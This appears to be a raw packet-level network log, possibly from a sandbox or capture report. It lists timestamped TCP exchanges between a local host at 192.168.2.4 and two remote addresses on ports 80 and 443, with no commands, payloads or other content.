Dec 8, 2024 19:52:08.884085894 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.884260893 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.884309053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.884852886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.884902954 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.884939909 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.884990931 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.885858059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.885934114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.885950089 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.885974884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.886837006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.886902094 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.886904001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.886936903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.887919903 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.887970924 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.888125896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.888174057 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.889549971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.889596939 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.889684916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.889728069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.890588999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.890639067 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.890734911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.890783072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.891650915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.891699076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.891732931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.891779900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.892566919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.892612934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.892636061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.892679930 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.941461086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.941483021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.941514015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.941540003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.941720963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.941764116 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.941924095 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.941977024 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.942064047 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.942110062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.942955017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.943013906 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.943053007 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.943092108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.943908930 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.943958044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.944015980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.944071054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.944950104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.944999933 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.945013046 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.945056915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.946090937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.946150064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.946321011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.946387053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:08.947110891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:08.947161913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.003024101 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.003092051 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.003139019 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.003187895 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.003429890 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.003473997 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.003484964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.003529072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.004328966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.004348993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.004374981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.004396915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.005490065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.005542994 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.005914927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.005960941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.005991936 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.006031990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.006922960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.006968021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.007070065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.007112026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.007972956 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.008028030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.008061886 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.008111000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.008960009 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.009008884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.009123087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.009171963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.010157108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.010205030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.010241032 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.010287046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.010930061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.010978937 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.011023045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.011066914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.011887074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.011933088 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.011972904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.012017012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.012862921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.012909889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.013045073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.013087988 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.014023066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.014066935 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.014172077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.014216900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.015153885 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.015217066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.015224934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.015255928 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.016204119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.016251087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.016253948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.016290903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.017047882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.017091990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.017174006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.017215014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.018141031 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.018184900 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.018299103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.018336058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.019254923 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.019299030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.019373894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.019417048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.019951105 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.019989967 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.020071983 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.020112991 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.020745993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.020782948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.020814896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.020858049 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.021411896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.021454096 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.021461964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.021501064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.022164106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.022207022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.022264957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.022301912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.023086071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.023132086 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.023461103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.023502111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.024044037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.024085999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.024143934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.024183989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.025053978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.025103092 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.025124073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.025163889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.026021004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.026082039 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.026114941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.026156902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.027035952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.027081966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.027163029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.027203083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.027975082 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.028019905 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.067529917 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.067593098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.067630053 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.067667961 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.067815065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.067857981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.067873955 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.067914009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.068753004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.068814039 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.068825006 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.068866968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.069811106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.069852114 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.069878101 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.069919109 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.070842981 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.070883989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.071029902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.071069956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.071811914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.071856022 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.071927071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.071968079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.072585106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.072624922 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.072788000 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.072829008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.073489904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.073529005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.073659897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.073699951 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.074573994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.074615955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.074709892 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.074748993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.075480938 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.075515032 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.075591087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.075630903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.076383114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.076426983 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.076438904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.076489925 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.077198029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.077246904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.077286959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.077331066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.078192949 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.078236103 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:09.078259945 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:09.078294039 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:11.087384939 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.087420940 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.087481022 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.090900898 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.090914965 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.252068043 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.252119064 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.252197981 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.252413988 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.252429008 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.326503038 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.326555014 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.326621056 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.326987982 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.327004910 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.361285925 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.361345053 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:11.361439943 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.361675978 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:11.361690998 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.769845963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:12.772603989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:12.792785883 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.794804096 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.794811964 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.795973063 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.796030998 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.797955990 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.798028946 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.798091888 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.798099995 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.847001076 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.947987080 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.948312998 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.948333979 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.949336052 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.949399948 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.949836016 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.949892998 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.950138092 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:12.950145960 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:12.990298033 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.015355110 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.054568052 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.067269087 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.069941998 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.069952965 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.070094109 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.070122004 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.071206093 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.071227074 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.071249008 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.071269035 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.071330070 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.078824997 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.078911066 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.082952976 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.083024979 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.112323046 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.112334013 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.130193949 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.130204916 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.164882898 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.178505898 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.192765951 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.193648100 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.193747044 CET	443	49735	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.193797112 CET	49735	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.235337019 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.645138979 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.645190954 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.645222902 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.645231009 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.645241976 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.645282030 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.645288944 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.660789013 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.660830975 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.660839081 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.663202047 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.663245916 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.663506031 CET	49732	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.663517952 CET	443	49732	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870022058 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870075941 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870110989 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870132923 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.870141029 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870162964 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.870178938 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.878233910 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.878293991 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.878303051 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.889043093 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.889122009 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.889132023 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.889585018 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.889740944 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.889801979 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.902082920 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.902111053 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.902158976 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.902169943 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:13.902214050 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.912688017 CET	49737	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:13.912714005 CET	443	49737	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.057873964 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.064255953 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.064305067 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.064328909 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.074683905 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.075217962 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.075236082 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.080244064 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.082633972 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.082642078 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.094356060 CET	443	49736	216.58.208.228	192.168.2.4
